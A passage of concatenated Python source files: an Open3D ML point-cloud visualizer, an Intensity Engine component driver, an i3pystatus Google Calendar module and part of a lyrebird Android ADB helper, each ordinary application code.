tcloud.point["__visualization_scalar"] = Visualizer._make_tcloud_array(
scalar)
flag |= rendering.Scene.UPDATE_UV0_FLAG
# Update RGB values
if attr is not None and (len(attr.shape) == 2 and attr.shape[1] >= 3):
max_val = float(self._rgb_combo.selected_text)
if max_val <= 0:
max_val = 255.0
colors = attr[:, [0, 1, 2]] * (1.0 / max_val)
tcloud.point["colors"] = Visualizer._make_tcloud_array(colors)
flag |= rendering.Scene.UPDATE_COLORS_FLAG
# Update geometry
if self._3d.scene.scene.has_geometry(name):
self._3d.scene.scene.update_geometry(name, tcloud, flag)
else:
self._3d.scene.add_geometry(name, tcloud, material)
node = self._name2treenode[name]
if node is not None:
self._3d.scene.show_geometry(name, node.checkbox.checked)
def _get_material(self):
self._update_gradient()
material = rendering.Material()
if self._shader.selected_text == self.SOLID_NAME:
material.shader = "unlitSolidColor"
c = self._color.color_value
material.base_color = [c.red, c.green, c.blue, 1.0]
elif self._shader.selected_text == self.COLOR_NAME:
material.shader = "defaultUnlit"
material.base_color = [1.0, 1.0, 1.0, 1.0]
else:
material.shader = "unlitGradient"
material.gradient = self._gradient
material.scalar_min = self._scalar_min
material.scalar_max = self._scalar_max
return material
def _update_bounding_boxes(self, animation_frame=None):
if len(self._attrname2lut) == 1:
# Can't do dict.values()[0], so have to iterate over the 1 element
for v in self._attrname2lut.values():
lut = v
elif "labels" in self._attrname2lut:
lut = self._attrname2lut["labels"]
elif "label" in self._attrname2lut:
lut = self._attrname2lut["label"]
else:
lut = None
mat = rendering.Material()
mat.shader = "unlitLine"
mat.line_width = 2 * self.window.scaling
if self._consolidate_bounding_boxes:
name = Model.bounding_box_prefix.split("/")[0]
boxes = []
# When consolidated we assume bbox_data.name is the geometry name.
if animation_frame is None:
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name in self._name2treenode and self._name2treenode[
bbox_data.name].checkbox.checked:
boxes += bbox_data.boxes
else:
geom_name = self._animation_frames[animation_frame]
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name == geom_name:
boxes = bbox_data.boxes
break
self._3d.scene.remove_geometry(name)
if len(boxes) > 0:
lines = BoundingBox3D.create_lines(boxes, lut)
self._3d.scene.add_geometry(name, lines, mat)
if name not in self._name2treenode:
self._add_tree_name(name, is_geometry=False)
self._3d.force_redraw()
else:
# Don't run this more than once if we aren't consolidating,
# because nothing will change.
if len(self._objects.bounding_box_data) > 0:
if self._objects.bounding_box_data[
0].name in self._name2treenode:
return
for bbox_data in self._objects.bounding_box_data:
lines = BoundingBox3D.create_lines(bbox_data.boxes, lut)
self._3d.scene.add_geometry(bbox_data.name, lines, mat)
for bbox_data in self._objects.bounding_box_data:
self._add_tree_name(bbox_data.name, is_geometry=False)
self._3d.force_redraw()
def _update_gradient(self):
if self._shader.selected_text == self.LABELS_NAME:
colors = self._label_edit.get_colors()
n = float(len(colors) - 1)
if n >= 1:
self._gradient.points = [
rendering.Gradient.Point(
float(i) / n, [
colors[i][0], colors[i][1], colors[i][2],
colors[i][3]
]) for i in range(0, len(colors))
]
else:
self._gradient.points = [
rendering.Gradient.Point(0.0, [1.0, 0.0, 1.0, 1.0])
]
self._gradient.mode = rendering.Gradient.LUT
else:
cmap = self._colormaps.get(self._shader.selected_text)
if cmap is not None:
self._gradient.points = [
rendering.Gradient.Point(
p.value, [p.color[0], p.color[1], p.color[2], 1.0])
for p in cmap.points
]
self._gradient.mode = rendering.Gradient.GRADIENT
def _update_geometry_colors(self):
material = self._get_material()
for name, tcloud in self._objects.tclouds.items():
if not tcloud.is_empty() and self._3d.scene.has_geometry(name):
self._3d.scene.modify_geometry_material(name, material)
self._3d.force_redraw()
def _update_datasource_combobox(self):
current = self._datasource_combobox.selected_text
self._datasource_combobox.clear_items()
available_attrs = self._get_available_attrs()
for attr_name in available_attrs:
self._datasource_combobox.add_item(attr_name)
if current in available_attrs:
self._datasource_combobox.selected_text = current
elif len(available_attrs) > 0:
self._datasource_combobox.selected_text = available_attrs[0]
else:
# If no attributes, two possibilities:
# 1) no geometries are selected: don't change anything
# 2) geometries are selected: color solid
has_checked = False
for n, node in self._name2treenode.items():
if node.checkbox.checked and self._is_tree_name_geometry(n):
has_checked = True
break
if has_checked:
self._set_shader(self.SOLID_NAME)
def _update_shaders_combobox(self):
current_attr = self._datasource_combobox.selected_text
current_shader = self._shader.selected_text
has_lut = (current_attr in self._attrname2lut)
is_scalar = True
selected_names = self._get_selected_names()
if len(selected_names) > 0 and len(
self._objects.get_attr_shape(selected_names[0],
current_attr)) > 1:
is_scalar = False
self._shader.clear_items()
if not is_scalar:
self._shader.add_item(self.COLOR_NAME)
if has_lut:
self._shader.add_item(self.LABELS_NAME)
self._label_edit.set_labels(self._attrname2lut[current_attr])
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.SOLID_NAME)
if current_shader == self.LABELS_NAME and has_lut:
self._set_shader(self.LABELS_NAME)
elif is_scalar:
self._set_shader(self.RAINBOW_NAME)
def _update_attr_range(self):
attr_name = self._datasource_combobox.selected_text
current_channel = self._colormap_channel.selected_index
self._scalar_min, self._scalar_max = self._objects.get_attr_minmax(
attr_name, current_channel)
if self._shader.selected_text in self._colormaps:
cmap = self._colormaps[self._shader.selected_text]
self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
def _set_shader(self, shader_name, force_update=False):
# Disable channel if we are using a vector shader. Always do this to
# ensure that the UI is consistent.
if shader_name == Visualizer.COLOR_NAME:
self._colormap_channel.enabled = False
else:
self._colormap_channel.enabled = True
if shader_name == self._shader.selected_text and not force_update:
return
self._shader.selected_text = shader_name
idx = self._shadername2panelidx[self._shader.selected_text]
self._shader_panels.selected_index = idx
if shader_name in self._colormaps:
cmap = self._colormaps[shader_name]
self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
self._update_geometry_colors()
def _on_layout(self, context):
frame = self.window.content_rect
em = context.theme.font_size
panel_width = 20 * em
panel_rect = gui.Rect(frame.get_right() - panel_width, frame.y,
panel_width, frame.height - frame.y)
self._panel.frame = panel_rect
self._3d.frame = gui.Rect(frame.x, frame.y, panel_rect.x - frame.x,
frame.height - frame.y)
def _on_arcball_mode(self):
self._3d.set_view_controls(gui.SceneWidget.ROTATE_CAMERA)
def _on_fly_mode(self):
self._3d.set_view_controls(gui.SceneWidget.FLY)
def _on_reset_camera(self):
self.setup_camera()
def _on_dataset_selection_changed(self, item):
name = self._treeid2name[item]
if not self._is_tree_name_geometry(name):
return
def ui_callback():
self._update_attr_range()
self._update_geometry(check_unloaded=True)
self._update_bounding_boxes()
if not self._objects.is_loaded(name):
self._load_geometry(name, ui_callback)
def _on_display_tab_changed(self, index):
if index == 1:
self._animation_frames = self._get_selected_names()
self._slider.set_limits(0, len(self._animation_frames) - 1)
self._on_animation_slider_changed(self._slider.int_value)
# _on_animation_slider_changed() calls _update_bounding_boxes()
else:
for name, node in self._name2treenode.items():
self._3d.scene.show_geometry(name, node.checkbox.checked)
self._update_bounding_boxes()
def _on_animation_slider_changed(self, new_value):
idx = int(new_value)
for i in range(0, len(self._animation_frames)):
self._3d.scene.show_geometry(self._animation_frames[i], (i == idx))
self._update_bounding_boxes(animation_frame=idx)
self._3d.force_redraw()
self._slider_current.text = self._animation_frames[idx]
r = self._slider_current.frame
self._slider_current.frame = gui.Rect(r.x, r.y,
self._slider.frame.get_right(),
r.height)
def _on_start_animation(self):
def on_tick():
return self._on_animate()
self._play.text = "Stop"
self._play.set_on_clicked(self._on_stop_animation)
self._last_animation_time = 0.0
self.window.set_on_tick_event(on_tick)
def _on_animate(self):
now = time.time()
if now >= self._last_animation_time + self._animation_delay_secs:
idx = (self._slider.int_value + 1) % len(self._animation_frames)
self._slider.int_value = idx
self._on_animation_slider_changed(idx)
self._last_animation_time = now
return True
return False
def _on_stop_animation(self):
self.window.set_on_tick_event(None)
self._play.text = "Play"
self._play.set_on_clicked(self._on_start_animation)
def _on_bgcolor_changed(self, new_color):
bg_color = [
new_color.red, new_color.green, new_color.blue, new_color.alpha
]
self._3d.scene.set_background(bg_color)
self._3d.force_redraw()
def _on_datasource_changed(self, attr_name, idx):
selected_names = self._get_selected_names()
n_channels = 1
if len(selected_names) > 0:
shape = self._objects.get_attr_shape(selected_names[0], attr_name)
if len(shape) <= 1:
n_channels = 1
else:
n_channels = max(1, shape[1])
current_channel = max(0, self._colormap_channel.selected_index)
current_channel = min(n_channels - 1, current_channel)
self._colormap_channel.clear_items()
for i in range(0, n_channels):
self._colormap_channel.add_item(str(i))
self._colormap_channel.selected_index = current_channel
self._update_attr_range()
self._update_shaders_combobox()
# Try to intelligently pick a shader.
current_shader = self._shader.selected_text
if current_shader == Visualizer.SOLID_NAME:
pass
elif attr_name in self._attrname2lut:
self._set_shader(Visualizer.LABELS_NAME)
elif attr_name == "colors":
self._set_shader(Visualizer.COLOR_NAME)
elif n_channels >= 3:
self._set_shader(Visualizer.RAINBOW_NAME)
elif current_shader == Visualizer.COLOR_NAME: # vector -> scalar
self._set_shader(Visualizer.RAINBOW_NAME)
else: # changing from one scalar to another, don't change
pass
self._update_geometry()
def _on_channel_changed(self, name, idx):
self._update_attr_range()
self._update_geometry() # need to recompute scalars array
def _on_shader_changed(self, name, idx):
# _shader.current_text is already name, so we need to force an update
self._set_shader(name, force_update=True)
def _on_shader_color_changed(self, color):
self._update_geometry_colors()
def _on_labels_changed(self):
self._update_geometry_colors()
def _on_colormap_changed(self):
self._colormaps[
self._shader.selected_text] = self._colormap_edit.colormap
self._update_geometry_colors()
def _on_rgb_multiplier(self, text, idx):
self._update_geometry()
def _get_selected_names(self):
# Note that things like bounding boxes could be in the tree, and we
# do not want to include them in the list of things selected, even if
# they are checked.
selected_names = []
for n in self._objects.data_names:
if self._name2treenode[n].checkbox.checked:
selected_names.append(n)
return selected_names
def _get_available_attrs(self):
selected_names = self._get_selected_names()
return self._objects.get_available_attrs(selected_names)
def _is_tree_name_geometry(self, name):
return (name in self._objects.data_names)
@staticmethod
def _make_tcloud_array(np_array, copy=False):
if copy or not np_array.data.c_contiguous:
return o3d.core.Tensor(np_array)
else:
return o3d.core.Tensor.from_numpy(np_array)
def visualize_dataset(self,
dataset,
split,
indices=None,
width=1024,
height=768):
"""Visualize a dataset.
Example:
Minimal example for visualizing a dataset::
import open3d.ml.torch as ml3d # or open3d.ml.tf as ml3d
dataset = ml3d.datasets.SemanticKITTI(dataset_path='/path/to/SemanticKITTI/')
vis = ml3d.vis.Visualizer()
vis.visualize_dataset(dataset, 'all', indices=range(100))
Args:
dataset: The dataset to use for visualization.
split: The dataset split to be used, such as 'training'
indices: An iterable with a subset of the data points to visualize, such as [0,2,3,4].
width: The width of the visualization window.
height: The height of the visualization window.
"""
# Setup the labels
lut = LabelLUT()
for val in sorted(dataset.label_to_names.values()):
lut.add_label(val, val)
self.set_lut("labels", lut)
self._consolidate_bounding_boxes = True
self._init_dataset(dataset, split, indices)
self._visualize("Open3D - " + dataset.name, width, height)
def visualize(self,
data,
lut=None,
bounding_boxes=None,
width=1024,
height=768):
"""Visualize a custom point cloud data.
Example:
Minimal example for visualizing a single point cloud with an
attribute::
import numpy as np
import open3d.ml.torch as ml3d
# or import open3d.ml.tf as ml3d
data = [ {
'name': 'my_point_cloud',
'points': np.random.rand(100,3).astype(np.float32),
'point_attr1': np.random.rand(100).astype(np.float32),
} ]
vis = ml3d.vis.Visualizer()
vis.visualize(data)
Args:
data: A list of dictionaries. Each dictionary is a point cloud with
attributes. Each dictionary must have the entries 'name' and
'points'. Points and point attributes can be passed as numpy
arrays, PyTorch tensors or TensorFlow tensors.
lut: Optional lookup table for colors.
bounding_boxes: Optional bounding boxes.
width: window width.
height: window height.
"""
self._init_data(data)
if lut is not None:
self.set_lut("labels", lut)
if bounding_boxes is not None:
prefix = Model.bounding_box_prefix
# Filament crashes if you have to many items, and anyway, hundreds
# of items is unweildy in a list. So combine items if we have too
# many.
group_size = int(math.floor(float(len(bounding_boxes)) / 100.0))
if group_size < 2:
box_data = [
Model.BoundingBoxData(prefix + str(bbox), [bbox])
for bbox in bounding_boxes
]
else:
box_data = []
current_group = []
n = len(bounding_boxes)
for i in range(0, n):
current_group.append(bounding_boxes[i])
if len(current_group) >= group_size or i == n - 1:
if i < n - 1:
name = prefix + "Boxes " + str(
i + 1 - group_size) + " - " + str(i)
else:
if len(current_group) > 1:
name = prefix + "Boxes " + str(
i + 1 - len(current_group)) + " - " + str(i)
else:
name = prefix + "Box " + str(i)
data = Model.BoundingBoxData(name, current_group)
box_data.append(data)
current_group = []
self._objects.bounding_box_data = box_data
self._visualize("Open3D", width, height)
def _visualize(self, title, width, height):
gui.Application.instance.initialize()
self._init_user_interface(title, width, height)
self._3d.scene.downsample_threshold = 400000
# Turn all the objects off except the first one
for name, node in self._name2treenode.items():
node.checkbox.checked = False
self._3d.scene.show_geometry(name, False)
for name in [self._objects.data_names[0]]:
self._name2treenode[name].checkbox.checked = True
self._3d.scene.show_geometry(name, True)
def on_done_ui():
# Add bounding boxes here: bounding boxes belonging to the dataset
# will not be loaded until now.
self._update_bounding_boxes()
self._update_datasource_combobox()
self._update_shaders_combobox()
# Display "colors" by default if available, "points" if not
available_attrs = self._get_available_attrs()
self._set_shader(self.SOLID_NAME, force_update=True)
if "colors" in available_attrs:
self._datasource_combobox.selected_text = "colors"
elif "points" in available_attrs:
self._datasource_combobox.selected_text = "points"
self._dont_update_geometry = True
self._on_datasource_changed(
self._datasource_combobox.selected_text,
self._datasource_combobox.selected_index)
self._update_geometry_colors()
self._dont_update_geometry = False
# _datasource_combobox was empty, now isn't, re-layout.
self.window.set_needs_layout()
self._update_geometry()
self.setup_camera()
self._load_geometries(self._objects.data_names, on_done_ui)
gui.Application.instance.run()
|
component_driver.py
|
# Copyright 2010 Alon Zakai ('kripken'). All rights reserved.
# This file is part of Syntensity/the Intensity Engine, an open source project. See COPYING.txt for licensing.
import os, signal, threading, time
from multiprocessing import Process, Queue
from intensity.base import *
from intensity.logging import *
from intensity.signals import signal_component, shutdown
## A general framework for a component, run in a separate process
class ComponentDriver:
class RESPONSE:
Callback = 0
Error = 1
def __init__(self, name, component_main, keep_alive_always=False, keep_alive_when_outgoing=False):
self.name = name
self.component_main = component_main
self.keep_alive_always = keep_alive_always
self.keep_alive_when_outgoing = keep_alive_when_outgoing
self.to_component = Queue()
self.from_component = Queue()
self.proc = None
self.proc_counter = 0
self.kickstart()
thread = threading.Thread(target=self.main_loop)
thread.setDaemon(True)
thread.start()
if self.keep_alive_always or self.keep_alive_when_outgoing:
thread = threading.Thread(target=self.keepalive_loop)
thread.setDaemon(True)
thread.start()
signal_component.connect(self.receive, weak=False)
def kickstart(self):
curr_proc_counter = self.proc_counter
self.proc_counter += 1
try:
shutdown.disconnect(self.proc.dispatch_uid)
except:
pass
try:
self.proc.terminate()
except:
pass
self.proc = Process(target=self.component_main, args=(self.to_component, self.from_component))
self.proc.daemon = True
self.proc.start()
# Daemon flag seems not to work, so do this
curr_proc = self.proc
curr_proc.dispatch_uid = curr_proc_counter
def terminate_proc(sender, **kwargs):
if curr_proc.is_alive():
try:
if WINDOWS:
curr_proc.terminate()
else:
os.kill(curr_proc.pid, signal.SIGKILL) # Stronger method
except:
pass
shutdown.connect(terminate_proc, weak=False, dispatch_uid=curr_proc_counter)
def main_loop(self):
while True:
response_type, data = self.from_component.get()
if response_type == ComponentDriver.RESPONSE.Callback:
callback, param = data
CModule.run_script('Tools.callbacks.tryCall("%s", "%s")' % (callback, param), 'component %s callback' % self.name)
elif response_type == ComponentDriver.RESPONSE.Error:
CModule.show_message('Error', 'Component %s: %s' % (self.name, data))
def keepalive_loop(self):
while True:
time.sleep(1.0)
# Restart
if not self.proc.is_alive() and (self.keep_alive_always or (self.keep_alive_when_outgoing and not self.to_component.empty())):
self.kickstart()
continue
def receive(self, sender, **kwargs):
component_id = kwargs['component_id']
data = kwargs['data']
try:
if component_id == self.name:
parts = data.split('|')
command = parts[0]
params = '|'.join(parts[1:])
self.to_component.put_nowait((command, params))
except Exception, e:
log(logging.ERROR, "Error in %s component: %s" + (self.name, str(e)))
return ''
|
google_calendar.py
|
import datetime
import threading
import httplib2
import oauth2client
import pytz
from apiclient import discovery
from dateutil import parser
from googleapiclient.errors import HttpError
from i3pystatus import IntervalModule, logger
from i3pystatus.core.color import ColorRangeModule
from i3pystatus.core.util import user_open, internet, require
class GoogleCalendar(IntervalModule, ColorRangeModule):
"""
Simple module for displaying next Google Calendar event.
Requires the Google Calendar API package - https://developers.google.com/google-apps/calendar/quickstart/python.
Additionally requires the `colour`, `httplib2`, `oauth2client`, `pytz`, `apiclient` and `dateutil` modules.
All top level keys returned by the Google Calendar API can be used as formatters. Some
examples include:
.. rubric:: Available formatters
* `{kind}` — type of event
* `{status}` — eg, confirmed
* `{summary}` — essentially the title
* `{remaining_time}` - how long remaining until the event
* `{start_time}` - when this event starts
* `{htmlLink}` — link to the calendar event
"""
settings = (
('format', 'format string'),
("credential_path", "Path to credentials"),
("skip_recurring", "Skip recurring events."),
("update_interval", "How often (in seconds) to call the Goggle API and update events"),
("days", "Only show events between now and this many days in the future"),
("urgent_seconds", "Add urgent hint when this many seconds until event startTime"),
("urgent_blink", "Whether or not to blink when the within urgent_seconds of event start"),
("start_color", "Hex or English name for start of color range, eg '#00FF00' or 'green'"),
("end_color", "Hex or English name for end of color range, eg '#FF0000' or 'red'"),
)
required = ('credential_path',)
format = "{summary} ({remaining_time})"
credential_path = None
interval = 1
skip_recurring = True
update_interval = 60
days = 1
urgent_seconds = 300
urgent_blink = False
color = None
service = None
credentials = None
display_event = None
last_event_refresh = None
urgent_acknowledged = False
update_lock = threading.Lock()
on_rightclick = 'acknowledge'
on_leftclick = 'open_calendar'
def init(self):
self.colors = self.get_hex_color_range(self.end_color, self.start_color, self.urgent_seconds * 2)
self.last_event_refresh = datetime.datetime.now(tz=pytz.UTC) - datetime.timedelta(seconds=self.update_interval)
@require(internet)
def run(self):
if self.service is None:
self.connect_service()
now = datetime.datetime.now(tz=pytz.UTC)
if self.should_update(now):
threading.Thread(target=self.update_display_event, args=(now,), daemon=True).start()
self.refresh_output(now)
def should_update(self, now):
"""
Whether or not we should update events.
"""
wait_window = self.last_event_refresh + datetime.timedelta(seconds=self.update_interval)
if self.display_event is None:
should_update = wait_window < now
elif self.display_event['start_time'] < now:
should_update = True
elif wait_window < now:
should_update = True
else:
should_update = False
return should_update and not self.update_lock.locked()
def update_display_event(self, now):
"""
Call the Google API and attempt to update the current event.
"""
with self.update_lock:
logger.debug("Retrieving events...".format(threading.current_thread().name))
self.last_event_refresh = now
for event in self.get_events(now):
# If we don't have a dateTime just make do with a date.
if 'dateTime' not in event['start']:
event['start_time'] = pytz.utc.localize(parser.parse(event['start']['date']))
else:
event['start_time'] = parser.parse(event['start']['dateTime'])
if 'recurringEventId' in event and self.skip_recurring:
continue
elif event['start_time'] < now:
continue
# It is possible for there to be no title...
if 'summary' not in event:
event['summary'] = '(no title)'
if self.display_event:
# If this is a new event, reset the urgent_acknowledged flag.
if self.display_event['id'] != event['id']:
self.urgent_acknowledged = False
self.display_event = event
return
self.display_event = None
def refresh_output(self, now):
"""
Build our output dict.
"""
if self.display_event:
start_time = self.display_event['start_time']
alert_time = now + datetime.timedelta(seconds=self.urgent_seconds)
self.display_event['remaining_time'] = str((start_time - now)).partition('.')[0]
urgent = self.is_urgent(alert_time, start_time, now)
color = self.get_color(now, start_time)
self.output = {
'full_text': self.format.format(**self.display_event),
'color': color,
'urgent': urgent
}
else:
self.output = {
'full_text': "",
}
def is_urgent(self, alert_time, start_time, now):
"""
Determine whether or not to set the urgent flag. If urgent_blink is set, toggles urgent flag
on and off every second.
"""
urgent = alert_time > start_time
if urgent and self.urgent_blink:
urgent = now.second % 2 == 0 and not self.urgent_acknowledged
return urgent
def get_events(self, now):
"""
Retrieve the next N events from Google.
"""
events = []
try:
now, later = self.get_timerange_formatted(now)
events_result = self.service.events().list(
calendarId='primary',
timeMin=now,
timeMax=later,
maxResults=10,
singleEvents=True,
orderBy='startTime',
timeZone='utc'
).execute()
events = events_result.get('items', [])
except HttpError as e:
if e.resp.status in (500, 503):
logger.warn("GoogleCalendar received %s while retrieving events" % e.resp.status)
else:
raise
return events
def get_timerange_formatted(self, now):
"""
Return two ISO8601 formatted date strings, one for timeMin, the other for timeMax (to be consumed by get_events)
"""
later = now + datetime.timedelta(days=self.days)
return now.isoformat(), later.isoformat()
def get_color(self, now, start_time):
seconds_to_event = (start_time - now).seconds
v = self.percentage(seconds_to_event, self.urgent_seconds)
color = self.get_gradient(v, self.colors)
return color
def connect_service(self):
logger.debug("Connecting Service..")
self.credentials = oauth2client.file.Storage(self.credential_path).get()
self.service = discovery.build('calendar', 'v3', http=self.credentials.authorize(httplib2.Http()))
def open_calendar(self):
if self.display_event:
calendar_url = self.display_event.get('htmlLink', None)
if calendar_url:
user_open(calendar_url)
def acknowledge(self):
self.urgent_acknowledged = True
|
android_helper.py
|
import os
import re
import sys
import time
import codecs
import lyrebird
import threading
import subprocess
from pathlib import Path
from . import config
from lyrebird.log import get_logger
"""
Android Debug Bridge command helper
Basic ADB command for device_service and API
"""
logger = get_logger()
ignore_devices_line = ['\r']
here = os.path.dirname(__file__)
adb = None
static = os.path.abspath(os.path.join(here, 'static'))
storage = lyrebird.get_plugin_storage()
tmp_dir = os.path.abspath(os.path.join(storage, 'tmp'))
anr_dir = os.path.abspath(os.path.join(storage, 'anr'))
crash_dir = os.path.abspath(os.path.join(storage, 'crash'))
screenshot_dir = os.path.abspath(os.path.join(storage, 'screenshot'))
apk_dir = Path(storage)/'apk'
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if not os.path.exists(anr_dir):
os.makedirs(anr_dir)
if not os.path.exists(crash_dir):
os.makedirs(crash_dir)
class ADBError(Exception):
pass
class AndroidHomeError(Exception):
pass
def check_adb_cmd():
p = subprocess.run('adb', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return p.stderr == b''
def check_android_home():
global adb
if check_adb_cmd():
adb = 'adb'
return
android_home = os.environ.get('ANDROID_HOME')
if not android_home:
raise AndroidHomeError('Environment variable ANDROID_HOME not found!')
if not os.path.exists(android_home):
raise AndroidHomeError('ANDROID_HOME %s not exists' % android_home)
if not os.path.isdir(android_home):
raise AndroidHomeError('ANDROID_HOME %s is not a dir' % android_home)
if sys.platform == 'win32':
adb = os.path.abspath(os.path.join(android_home, 'platform-tools/adb.exe'))
elif sys.platform == 'darwin' or sys.platform == 'linux':
adb = os.path.abspath(os.path.join(android_home, 'platform-tools/adb'))
else:
raise ADBError('Unsupported platform')
class App:
def __init__(self, package):
self.package = package
self.launch_activity = None
self.version_name = None
self.version_code = None
self.raw = None
@classmethod
def from_raw(cls, package, raw_data):
app = cls(package)
app.raw = raw_data
lines = raw_data.split('\n')
actionMAIN_line_num = None
for index, line in enumerate(lines):
if 'versionCode' in line:
app.version_code = line.strip().split(' ')[0]
if 'versionName' in line:
app.version_name = line.strip().split('=')[1]
if 'android.intent.action.MAIN:' in line:
actionMAIN_line_num = index + 1
if app.version_name and app.version_code and actionMAIN_line_num:
package_name_line = lines[actionMAIN_line_num]
app.launch_activity = package_name_line.strip().split()[1]
break
return app
class Device:
def __init__(self, device_id):
self.device_id = device_id
self.state = None
self.product = None
self.model = None
self._log_process = None
self._log_cache = []
self._log_crash_cache = []
self._crashed_pid = None
self._crashed_package = None
self._log_file = None
self._device_info = None
self._app_info = None
self.start_catch_log = False
@property
def log_file(self):
return self._log_file
@classmethod
def from_adb_line(cls, line):
device_info = [info for info in line.split(' ') if info]
if len(device_info) < 2:
raise ADBError(f'Read device info line error. {line}')
_device = cls(device_info[0])
_device.state = device_info[1]
for info in device_info[2:]:
info_kv = info.split(':')
if len(info_kv) >= 2:
setattr(_device, info_kv[0], info_kv[1])
else:
logger.error(f'Read device info error: unknown format {info_kv}')
return _device
def install(self, apk_file):
subprocess.run(f'{adb} -s {self.device_id} install -r {apk_file}', shell=True)
def push(self, src, dst):
subprocess.run(f'{adb} -s {self.device_id} push {src} {dst}')
def pull(self, src, dst):
subprocess.run(f'{adb} -s {self.device_id} pull {src} {dst}')
def start_log(self):
self.stop_log()
self._log_file = os.path.abspath(os.path.join(tmp_dir, f'android_log_{self.device_id}.log'))
p = subprocess.Popen(f'{adb} -s {self.device_id} logcat', shell=True, stdout=subprocess.PIPE)
def log_handler(logcat_process):
log_file = codecs.open(self._log_file, 'w', 'utf-8')
self._log_process = logcat_process
while True:
line = logcat_process.stdout.readline()
line = line.decode(encoding='UTF-8', errors='ignore')
if not line:
lyrebird.emit('android-log', self._log_cache)
log_file.close()
return
self._log_cache.append(line)
self.crash_checker(line)
self.anr_checker(line)
if len(self._log_cache) >= 10:
lyrebird.emit('android-log', self._log_cache)
log_file.writelines(self._log_cache)
log_file.flush()
self._log_cache = []
threading.Thread(target=log_handler, args=(p,)).start()
def get_package_from_pid(self, pid):
p = subprocess.run(f'{adb} -s {self.device_id} shell ps | grep {pid}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not p.stdout.decode():
return ''
package = [line for line in p.stdout.decode().strip().split()][-1]
package = package.replace(':', '')
package = package.replace('/', '')
return package
def crash_checker(self, line):
if line.find('FATAL EXCEPTION') > 0:
self.start_catch_log = True
_crashed_pid = [_ for _ in line.strip().split()][2]
self._crashed_package = self.get_package_from_pid(_crashed_pid)
self._log_crash_cache.append(line)
elif line.find('AndroidRuntime') > 0 and self.start_catch_log:
self._log_crash_cache.append(line)
elif self.start_catch_log:
_crash_file = os.path.abspath(os.path.join(
crash_dir,
f'android_crash_{self.device_id}_{self._crashed_package}.log'
))
with codecs.open(_crash_file, 'w', 'utf-8') as f:
f.write(''.join(self._log_crash_cache))
target_package_name = config.load().package_name
if self._crashed_package == target_package_name:
crash_info = {
'device_id':self.device_id,
'log': self._log_crash_cache,
'log_file_path': _crash_file
}
lyrebird.publish('android.crash', crash_info)
title = f'Android device {self.device_id} crashed!\n'
desc = title + 'Crash log:\n\n' + ''.join(self._log_crash_cache)
lyrebird.event.issue(title, desc)
self.start_catch_log = False
self._log_crash_cache = []
else:
return
def anr_checker(self, line):
if ('ANR' not in line) or ('ActivityManager' not in line):
return
anr_package = line.strip().split()[-2]
re_str = "^([a-z_]{1}[a-z0-9_]*(\.[a-z_]{1}[a-z0-9_]*)*)$"
# Check pkg name
if re.match(re_str, anr_package) is None:
return
anr_file_name = os.path.join(anr_dir, f'android_anr_{self.device_id}_{anr_package}.log')
p = subprocess.run(f'{adb} -s {self.device_id} pull "/data/anr/traces.txt" {anr_file_name}',
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
logger.error('Catch ANR log error!\n' + p.stderr.decode())
return
# check whether pid of the anr_package exists or not
with codecs.open(anr_file_name, 'r', 'utf-8') as f:
anr_pid_line = f.readline()
# expected anr_pid_line: ----- pid 21335 at 2019-06-24 16:21:15 -----
while 'pid' not in anr_pid_line:
anr_pid_line = f.readline()
_anr_pid = anr_pid_line.strip().split()[2]
anr_package = self.get_package_from_pid(_anr_pid)
target_package_name = config.load().package_name
if anr_package == target_package_name:
with codecs.open(anr_file_name, 'r', 'utf-8') as f:
log_anr_cache = f.readlines()
anr_info = {
'device_id':self.device_id,
'log': log_anr_cache,
'log_file_path': anr_file_name
}
lyrebird.publish('android.crash', anr_info)
title = f'Application {anr_package} not responding on Android device {self.device_id}!\n'
desc = title + 'ANR log:\n\n' + ''.join(log_anr_cache)
lyrebird.event.issue(title, desc)
@property
def device_info(self):
if not self._device_info:
self._device_info = self.get_properties()
return self._device_info
def get_properties(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell getprop', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def get_all_packages(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell pm list packages', shell=True, stdout=subprocess.PIPE)
res = []
if p.returncode == 0:
output = p.stdout.decode()
res = [item.split(':')[1].strip() for item in output.strip().split('\n') if item]
return res
def package_info(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys package {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
app = App.from_raw(package_name, p.stdout.decode())
if config.get_config('package.launch.activity'):
app.launch_activity = config.get_config('package.launch.activity')
return app
def package_meminfo(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys meminfo {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def device_cpuinfo(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys cpuinfo', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def stop_log(self):
if self._log_process:
self._log_process.kill()
self._log_process = None
def take_screen_shot(self):
if not os.path.exists(screenshot_dir):
os.makedirs(screenshot_dir)
timestamp = int(time.time())
screen_shot_file = os.path.abspath(os.path.join(screenshot_dir, f'android_screenshot_{self.device_id}_{timestamp}.png'))
p = subprocess.run(f'{adb} -s {self.device_id} exec-out screencap -p > {screen_shot_file}', shell=True)
if p.returncode == 0:
return dict({
'screen_shot_file': screen_shot_file,
'device_id': self.device_id,
'timestamp': timestamp
})
return {}
def get_device_ip(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell ip -o -4 address', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
for net_line in output:
if 'wlan0' in net_line:
ipv4_list = net_line.split()
